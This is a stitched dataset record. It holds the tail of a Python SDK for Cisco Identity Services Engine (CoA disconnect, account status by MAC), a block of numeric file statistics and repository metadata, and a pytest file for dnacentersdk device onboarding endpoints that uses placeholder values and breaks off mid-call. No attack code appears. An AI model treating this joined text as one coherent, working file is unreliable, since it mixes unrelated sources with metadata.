'DISCONNECT_TYPE': dis_con_nec_tty_pe,
'NAS_IPV4': nas_ipv4,
}
e_url = ('/admin/API/mnt/CoA/Disconnect>/{PSN_NAME}/{MAC}/{DISCONN'
+ 'ECT_TYPE}/{NAS_IPV4}/{{ENDPOINT_IP}}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_a097870d5734861255a347911a24_v3_1_1', _api_response)
def get_account_status_by_mac(self,
duration,
mac,
headers=None,
**query_parameters):
"""AccountStatus by MAC.
Args:
mac(basestring): mac path parameter.
duration(basestring): duration path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(mac, basestring,
may_be_none=False)
check_type(duration, basestring,
may_be_none=False)
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'mac': mac,
'duration': duration,
}
e_url = ('/admin/API/mnt/AcctStatus/MACAddress/{mac}/{duration}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_ab0a3ec0359faa72142f074145f6a_v3_1_1', _api_response)
| 38.025483
| 124
| 0.592748
| 4,641
| 43,273
| 5.26783
| 0.064426
| 0.041721
| 0.035463
| 0.027201
| 0.861666
| 0.84285
| 0.821949
| 0.803747
| 0.794707
| 0.785995
| 0
| 0.014414
| 0.342662
| 43,273
| 1,137
| 125
| 38.058927
| 0.845069
| 0.379475
| 0
| 0.739677
| 0
| 0
| 0.075311
| 0.060059
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032316
| false
| 0
| 0.010772
| 0
| 0.075404
| 0.001795
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0afbf737ad3de3e6306123575d124b23084f9cc2
| 56,512
|
py
|
Python
|
tests/api/v1_3_1/test_device_onboarding_pnp.py
|
nonstdout/dnacentersdk
|
dbbbc4baa5300aa9e5c9193f2ea71438018095f5
|
[
"MIT"
] | null | null | null |
tests/api/v1_3_1/test_device_onboarding_pnp.py
|
nonstdout/dnacentersdk
|
dbbbc4baa5300aa9e5c9193f2ea71438018095f5
|
[
"MIT"
] | null | null | null |
tests/api/v1_3_1/test_device_onboarding_pnp.py
|
nonstdout/dnacentersdk
|
dbbbc4baa5300aa9e5c9193f2ea71438018095f5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""DNACenterAPI device_onboarding_pnp API fixtures and tests.
Copyright (c) 2019-2020 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import pytest
from tests.environment import DNA_CENTER_VERSION
pytestmark = pytest.mark.skipif(DNA_CENTER_VERSION != '1.3.1', reason='version does not match')
def is_valid_get_sync_result_for_virtual_account(json_schema_validate, obj):
json_schema_validate('jsd_0a9c988445cb91c8_v1_3_1').validate(obj)
return True
def get_sync_result_for_virtual_account(api):
endpoint_result = api.device_onboarding_pnp.get_sync_result_for_virtual_account(
domain='string',
name='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_sync_result_for_virtual_account(api, validator):
assert is_valid_get_sync_result_for_virtual_account(
validator,
get_sync_result_for_virtual_account(api)
)
def get_sync_result_for_virtual_account_default(api):
endpoint_result = api.device_onboarding_pnp.get_sync_result_for_virtual_account(
domain='string',
name='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_sync_result_for_virtual_account_default(api, validator):
try:
assert is_valid_get_sync_result_for_virtual_account(
validator,
get_sync_result_for_virtual_account_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_un_claim_device(json_schema_validate, obj):
json_schema_validate('jsd_0b836b7b4b6a9fd5_v1_3_1').validate(obj)
return True
def un_claim_device(api):
endpoint_result = api.device_onboarding_pnp.un_claim_device(
active_validation=True,
deviceIdList=['string'],
payload=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_un_claim_device(api, validator):
assert is_valid_un_claim_device(
validator,
un_claim_device(api)
)
def un_claim_device_default(api):
endpoint_result = api.device_onboarding_pnp.un_claim_device(
active_validation=True,
deviceIdList=None,
payload=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_un_claim_device_default(api, validator):
try:
assert is_valid_un_claim_device(
validator,
un_claim_device_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_update_device(json_schema_validate, obj):
json_schema_validate('jsd_09b0f9ce4239ae10_v1_3_1').validate(obj)
return True
def update_device(api):
endpoint_result = api.device_onboarding_pnp.update_device(
_id='string',
active_validation=True,
deviceInfo={'aaaCredentials': {'password': 'string', 'username': 'string'}, 'addedOn': 0, 'addnMacAddrs': ['string'], 'agentType': 'POSIX', 'authStatus': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'cmState': 'NotContacted', 'description': 'string', 'deviceSudiSerialNos': ['string'], 'deviceType': 'string', 'featuresSupported': ['string'], 'fileSystemList': [{'freespace': 0, 'name': 'string', 'readable': True, 'size': 0, 'type': 'string', 'writeable': True}], 'firstContact': 0, 'hostname': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'imageFile': 'string', 'imageVersion': 'string', 'ipInterfaces': [{'ipv4Address': {}, 'ipv6AddressList': [{}], 'macAddress': 'string', 'name': 'string', 'status': 'string'}], 'lastContact': 0, 'lastSyncTime': 0, 'lastUpdateOn': 0, 'location': {'address': 'string', 'altitude': 'string', 'latitude': 'string', 'longitude': 'string', 'siteId': 'string'}, 'macAddress': 'string', 'mode': 'string', 'name': 'string', 'neighborLinks': [{'localInterfaceName': 'string', 'localMacAddress': 'string', 'localShortInterfaceName': 'string', 'remoteDeviceName': 'string', 'remoteInterfaceName': 'string', 'remoteMacAddress': 'string', 'remotePlatform': 'string', 'remoteShortInterfaceName': 'string', 'remoteVersion': 'string'}], 'onbState': 'NotContacted', 'pid': 'string', 'pnpProfileList': [{'createdBy': 'string', 'discoveryCreated': True, 'primaryEndpoint': {'certificate': 'string', 'fqdn': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'port': 0, 'protocol': 'string'}, 'profileName': 'string', 'secondaryEndpoint': {'certificate': 'string', 'fqdn': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'port': 0, 'protocol': 'string'}}], 'populateInventory': True, 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'projectId': 'string', 'projectName': 'string', 'reloadRequested': True, 'serialNumber': 'string', 'smartAccountId': 'string', 'source': 'string', 'stack': True, 'stackInfo': {'isFullRing': True, 'stackMemberList': [{'hardwareVersion': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'macAddress': 'string', 'pid': 'string', 'priority': 0, 'role': 'string', 'serialNumber': 'string', 'softwareVersion': 'string', 'stackNumber': 0, 'state': 'string', 'sudiSerialNumber': 'string'}], 'stackRingProtocol': 'string', 'supportsStackWorkflows': True, 'totalMemberCount': 0, 'validLicenseLevels': ['string']}, 'state': 'Unclaimed', 'sudiRequired': True, 'tags': {}, 'userSudiSerialNos': ['string'], 'virtualAccountId': 'string', 'workflowId': 'string', 'workflowName': 'string'},
id='string',
payload=None,
runSummaryList=[{'details': 'string', 'errorFlag': True, 'historyTaskInfo': {'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string', 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}, 'timestamp': 0}],
systemResetWorkflow={'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0},
systemWorkflow={'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0},
tenantId='string',
version=0,
workflow={'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0},
workflowParameters={'configList': [{'configId': 'string', 'configParameters': [{'key': 'string', 'value': 'string'}]}], 'licenseLevel': 'string', 'licenseType': 'string', 'topOfStackSerialNumber': 'string'}
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_update_device(api, validator):
assert is_valid_update_device(
validator,
update_device(api)
)
def update_device_default(api):
endpoint_result = api.device_onboarding_pnp.update_device(
_id=None,
active_validation=True,
deviceInfo=None,
id='string',
payload=None,
runSummaryList=None,
systemResetWorkflow=None,
systemWorkflow=None,
tenantId=None,
version=None,
workflow=None,
workflowParameters=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_update_device_default(api, validator):
try:
assert is_valid_update_device(
validator,
update_device_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_add_virtual_account(json_schema_validate, obj):
json_schema_validate('jsd_1e962af345b8b59f_v1_3_1').validate(obj)
return True
def add_virtual_account(api):
endpoint_result = api.device_onboarding_pnp.add_virtual_account(
active_validation=True,
autoSyncPeriod=0,
ccoUser='string',
expiry=0,
lastSync=0,
payload=None,
profile={'addressFqdn': 'string', 'addressIpV4': 'string', 'cert': 'string', 'makeDefault': True, 'name': 'string', 'port': 0, 'profileId': 'string', 'proxy': True},
smartAccountId='string',
syncResult={'syncList': [{'deviceSnList': ['string'], 'syncType': 'Add'}], 'syncMsg': 'string'},
syncResultStr='string',
syncStartTime=0,
syncStatus='NOT_SYNCED',
tenantId='string',
token='string',
virtualAccountId='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_add_virtual_account(api, validator):
assert is_valid_add_virtual_account(
validator,
add_virtual_account(api)
)
def add_virtual_account_default(api):
endpoint_result = api.device_onboarding_pnp.add_virtual_account(
active_validation=True,
autoSyncPeriod=None,
ccoUser=None,
expiry=None,
lastSync=None,
payload=None,
profile=None,
smartAccountId=None,
syncResult=None,
syncResultStr=None,
syncStartTime=None,
syncStatus=None,
tenantId=None,
token=None,
virtualAccountId=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_add_virtual_account_default(api, validator):
try:
assert is_valid_add_virtual_account(
validator,
add_virtual_account_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_deregister_virtual_account(json_schema_validate, obj):
json_schema_validate('jsd_2499e9ad42e8ae5b_v1_3_1').validate(obj)
return True
def deregister_virtual_account(api):
endpoint_result = api.device_onboarding_pnp.deregister_virtual_account(
domain='string',
name='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_deregister_virtual_account(api, validator):
assert is_valid_deregister_virtual_account(
validator,
deregister_virtual_account(api)
)
def deregister_virtual_account_default(api):
endpoint_result = api.device_onboarding_pnp.deregister_virtual_account(
domain=None,
name=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_deregister_virtual_account_default(api, validator):
try:
assert is_valid_deregister_virtual_account(
validator,
deregister_virtual_account_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_get_smart_account_list(json_schema_validate, obj):
json_schema_validate('jsd_3cb24acb486b89d2_v1_3_1').validate(obj)
return True
def get_smart_account_list(api):
endpoint_result = api.device_onboarding_pnp.get_smart_account_list(
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_smart_account_list(api, validator):
assert is_valid_get_smart_account_list(
validator,
get_smart_account_list(api)
)
def get_smart_account_list_default(api):
endpoint_result = api.device_onboarding_pnp.get_smart_account_list(
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_smart_account_list_default(api, validator):
try:
assert is_valid_get_smart_account_list(
validator,
get_smart_account_list_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_claim_a_device_to_a_site(json_schema_validate, obj):
return True if obj else False
def claim_a_device_to_a_site(api):
endpoint_result = api.device_onboarding_pnp.claim_a_device_to_a_site(
active_validation=True,
deviceId='string',
payload=None,
siteId='string',
type='Default'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_claim_a_device_to_a_site(api, validator):
assert is_valid_claim_a_device_to_a_site(
validator,
claim_a_device_to_a_site(api)
)
def claim_a_device_to_a_site_default(api):
endpoint_result = api.device_onboarding_pnp.claim_a_device_to_a_site(
active_validation=True,
deviceId=None,
payload=None,
siteId=None,
type=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_claim_a_device_to_a_site_default(api, validator):
try:
assert is_valid_claim_a_device_to_a_site(
validator,
claim_a_device_to_a_site_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_update_pnp_server_profile(json_schema_validate, obj):
json_schema_validate('jsd_6f9819e84178870c_v1_3_1').validate(obj)
return True
def update_pnp_server_profile(api):
endpoint_result = api.device_onboarding_pnp.update_pnp_server_profile(
active_validation=True,
autoSyncPeriod=0,
ccoUser='string',
expiry=0,
lastSync=0,
payload=None,
profile={'addressFqdn': 'string', 'addressIpV4': 'string', 'cert': 'string', 'makeDefault': True, 'name': 'string', 'port': 0, 'profileId': 'string', 'proxy': True},
smartAccountId='string',
syncResult={'syncList': [{'deviceSnList': ['string'], 'syncType': 'Add'}], 'syncMsg': 'string'},
syncResultStr='string',
syncStartTime=0,
syncStatus='NOT_SYNCED',
tenantId='string',
token='string',
virtualAccountId='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_update_pnp_server_profile(api, validator):
assert is_valid_update_pnp_server_profile(
validator,
update_pnp_server_profile(api)
)
def update_pnp_server_profile_default(api):
endpoint_result = api.device_onboarding_pnp.update_pnp_server_profile(
active_validation=True,
autoSyncPeriod=None,
ccoUser=None,
expiry=None,
lastSync=None,
payload=None,
profile=None,
smartAccountId=None,
syncResult=None,
syncResultStr=None,
syncStartTime=None,
syncStatus=None,
tenantId=None,
token=None,
virtualAccountId=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_update_pnp_server_profile_default(api, validator):
try:
assert is_valid_update_pnp_server_profile(
validator,
update_pnp_server_profile_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_get_workflow_count(json_schema_validate, obj):
json_schema_validate('jsd_7989f86846faaf99_v1_3_1').validate(obj)
return True
def get_workflow_count(api):
endpoint_result = api.device_onboarding_pnp.get_workflow_count(
name='value1,value2'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_workflow_count(api, validator):
assert is_valid_get_workflow_count(
validator,
get_workflow_count(api)
)
def get_workflow_count_default(api):
endpoint_result = api.device_onboarding_pnp.get_workflow_count(
name=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_workflow_count_default(api, validator):
try:
assert is_valid_get_workflow_count(
validator,
get_workflow_count_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_get_workflow_by_id(json_schema_validate, obj):
json_schema_validate('jsd_80acb88e4ac9ac6d_v1_3_1').validate(obj)
return True
def get_workflow_by_id(api):
endpoint_result = api.device_onboarding_pnp.get_workflow_by_id(
id='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_workflow_by_id(api, validator):
assert is_valid_get_workflow_by_id(
validator,
get_workflow_by_id(api)
)
def get_workflow_by_id_default(api):
endpoint_result = api.device_onboarding_pnp.get_workflow_by_id(
id='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_workflow_by_id_default(api, validator):
try:
assert is_valid_get_workflow_by_id(
validator,
get_workflow_by_id_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_get_virtual_account_list(json_schema_validate, obj):
json_schema_validate('jsd_70a479a6462a9496_v1_3_1').validate(obj)
return True
def get_virtual_account_list(api):
endpoint_result = api.device_onboarding_pnp.get_virtual_account_list(
domain='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_virtual_account_list(api, validator):
assert is_valid_get_virtual_account_list(
validator,
get_virtual_account_list(api)
)
def get_virtual_account_list_default(api):
endpoint_result = api.device_onboarding_pnp.get_virtual_account_list(
domain='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_virtual_account_list_default(api, validator):
try:
assert is_valid_get_virtual_account_list(
validator,
get_virtual_account_list_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_add_a_workflow(json_schema_validate, obj):
json_schema_validate('jsd_848b5a7b4f9b8c12_v1_3_1').validate(obj)
return True
def add_a_workflow(api):
endpoint_result = api.device_onboarding_pnp.add_a_workflow(
_id='string',
active_validation=True,
addToInventory=True,
addedOn=0,
configId='string',
currTaskIdx=0,
description='string',
endTime=0,
execTime=0,
imageId='string',
instanceType='SystemWorkflow',
lastupdateOn=0,
name='string',
payload=None,
startTime=0,
state='string',
tasks=[{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}],
tenantId='string',
type='string',
useState='string',
version=0
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_add_a_workflow(api, validator):
assert is_valid_add_a_workflow(
validator,
add_a_workflow(api)
)
def add_a_workflow_default(api):
endpoint_result = api.device_onboarding_pnp.add_a_workflow(
_id=None,
active_validation=True,
addToInventory=None,
addedOn=None,
configId=None,
currTaskIdx=None,
description=None,
endTime=None,
execTime=None,
imageId=None,
instanceType=None,
lastupdateOn=None,
name=None,
payload=None,
startTime=None,
state=None,
tasks=None,
tenantId=None,
type=None,
useState=None,
version=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_add_a_workflow_default(api, validator):
try:
assert is_valid_add_a_workflow(
validator,
add_a_workflow_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_sync_virtual_account_devices(json_schema_validate, obj):
json_schema_validate('jsd_a4b6c87a4ffb9efa_v1_3_1').validate(obj)
return True
def sync_virtual_account_devices(api):
endpoint_result = api.device_onboarding_pnp.sync_virtual_account_devices(
active_validation=True,
autoSyncPeriod=0,
ccoUser='string',
expiry=0,
lastSync=0,
payload=None,
profile={'addressFqdn': 'string', 'addressIpV4': 'string', 'cert': 'string', 'makeDefault': True, 'name': 'string', 'port': 0, 'profileId': 'string', 'proxy': True},
smartAccountId='string',
syncResult={'syncList': [{'deviceSnList': ['string'], 'syncType': 'Add'}], 'syncMsg': 'string'},
syncResultStr='string',
syncStartTime=0,
syncStatus='NOT_SYNCED',
tenantId='string',
token='string',
virtualAccountId='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_sync_virtual_account_devices(api, validator):
assert is_valid_sync_virtual_account_devices(
validator,
sync_virtual_account_devices(api)
)
def sync_virtual_account_devices_default(api):
endpoint_result = api.device_onboarding_pnp.sync_virtual_account_devices(
active_validation=True,
autoSyncPeriod=None,
ccoUser=None,
expiry=None,
lastSync=None,
payload=None,
profile=None,
smartAccountId=None,
syncResult=None,
syncResultStr=None,
syncStartTime=None,
syncStatus=None,
tenantId=None,
token=None,
virtualAccountId=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_sync_virtual_account_devices_default(api, validator):
try:
assert is_valid_sync_virtual_account_devices(
validator,
sync_virtual_account_devices_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_reset_device(json_schema_validate, obj):
json_schema_validate('jsd_9e857b5a4a0bbcdb_v1_3_1').validate(obj)
return True
def reset_device(api):
endpoint_result = api.device_onboarding_pnp.reset_device(
active_validation=True,
deviceResetList=[{'configList': [{'configId': 'string', 'configParameters': [{'key': 'string', 'value': 'string'}]}], 'deviceId': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'topOfStackSerialNumber': 'string'}],
payload=None,
projectId='string',
workflowId='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_reset_device(api, validator):
assert is_valid_reset_device(
validator,
reset_device(api)
)
def reset_device_default(api):
endpoint_result = api.device_onboarding_pnp.reset_device(
active_validation=True,
deviceResetList=None,
payload=None,
projectId=None,
workflowId=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_reset_device_default(api, validator):
try:
assert is_valid_reset_device(
validator,
reset_device_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_get_workflows(json_schema_validate, obj):
json_schema_validate('jsd_aeb4dad04a99bbe3_v1_3_1').validate(obj)
return True
def get_workflows(api):
endpoint_result = api.device_onboarding_pnp.get_workflows(
limit=0,
name='value1,value2',
offset=0,
sort='value1,value2',
sort_order='string',
type='value1,value2'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_workflows(api, validator):
assert is_valid_get_workflows(
validator,
get_workflows(api)
)
def get_workflows_default(api):
endpoint_result = api.device_onboarding_pnp.get_workflows(
limit=None,
name=None,
offset=None,
sort=None,
sort_order=None,
type=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_workflows_default(api, validator):
try:
assert is_valid_get_workflows(
validator,
get_workflows_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_get_device_by_id(json_schema_validate, obj):
json_schema_validate('jsd_bab6c9e5440885cc_v1_3_1').validate(obj)
return True
def get_device_by_id(api):
endpoint_result = api.device_onboarding_pnp.get_device_by_id(
id='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_device_by_id(api, validator):
assert is_valid_get_device_by_id(
validator,
get_device_by_id(api)
)
def get_device_by_id_default(api):
endpoint_result = api.device_onboarding_pnp.get_device_by_id(
id='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_device_by_id_default(api, validator):
try:
assert is_valid_get_device_by_id(
validator,
get_device_by_id_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_get_device_count(json_schema_validate, obj):
json_schema_validate('jsd_d9a1fa9c4068b23c_v1_3_1').validate(obj)
return True
def get_device_count(api):
endpoint_result = api.device_onboarding_pnp.get_device_count(
cm_state='value1,value2',
last_contact=True,
name='value1,value2',
onb_state='value1,value2',
pid='value1,value2',
project_id='value1,value2',
project_name='value1,value2',
serial_number='value1,value2',
smart_account_id='value1,value2',
source='value1,value2',
state='value1,value2',
virtual_account_id='value1,value2',
workflow_id='value1,value2',
workflow_name='value1,value2'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_device_count(api, validator):
assert is_valid_get_device_count(
validator,
get_device_count(api)
)
def get_device_count_default(api):
endpoint_result = api.device_onboarding_pnp.get_device_count(
cm_state=None,
last_contact=None,
name=None,
onb_state=None,
pid=None,
project_id=None,
project_name=None,
serial_number=None,
smart_account_id=None,
source=None,
state=None,
virtual_account_id=None,
workflow_id=None,
workflow_name=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_device_count_default(api, validator):
try:
assert is_valid_get_device_count(
validator,
get_device_count_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_get_device_history(json_schema_validate, obj):
json_schema_validate('jsd_f09319674049a7d4_v1_3_1').validate(obj)
return True
def get_device_history(api):
endpoint_result = api.device_onboarding_pnp.get_device_history(
serial_number='string',
sort='value1,value2',
sort_order='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_device_history(api, validator):
assert is_valid_get_device_history(
validator,
get_device_history(api)
)
def get_device_history_default(api):
endpoint_result = api.device_onboarding_pnp.get_device_history(
serial_number=None,
sort=None,
sort_order=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_device_history_default(api, validator):
try:
assert is_valid_get_device_history(
validator,
get_device_history_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_delete_device_by_id_from_pnp(json_schema_validate, obj):
json_schema_validate('jsd_cdab9b474899ae06_v1_3_1').validate(obj)
return True
def delete_device_by_id_from_pnp(api):
endpoint_result = api.device_onboarding_pnp.delete_device_by_id_from_pnp(
id='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_delete_device_by_id_from_pnp(api, validator):
assert is_valid_delete_device_by_id_from_pnp(
validator,
delete_device_by_id_from_pnp(api)
)
def delete_device_by_id_from_pnp_default(api):
endpoint_result = api.device_onboarding_pnp.delete_device_by_id_from_pnp(
id='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_delete_device_by_id_from_pnp_default(api, validator):
try:
assert is_valid_delete_device_by_id_from_pnp(
validator,
delete_device_by_id_from_pnp_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_import_devices_in_bulk(json_schema_validate, obj):
json_schema_validate('jsd_21a6db2540298f55_v1_3_1').validate(obj)
return True
def import_devices_in_bulk(api):
endpoint_result = api.device_onboarding_pnp.import_devices_in_bulk(
active_validation=True,
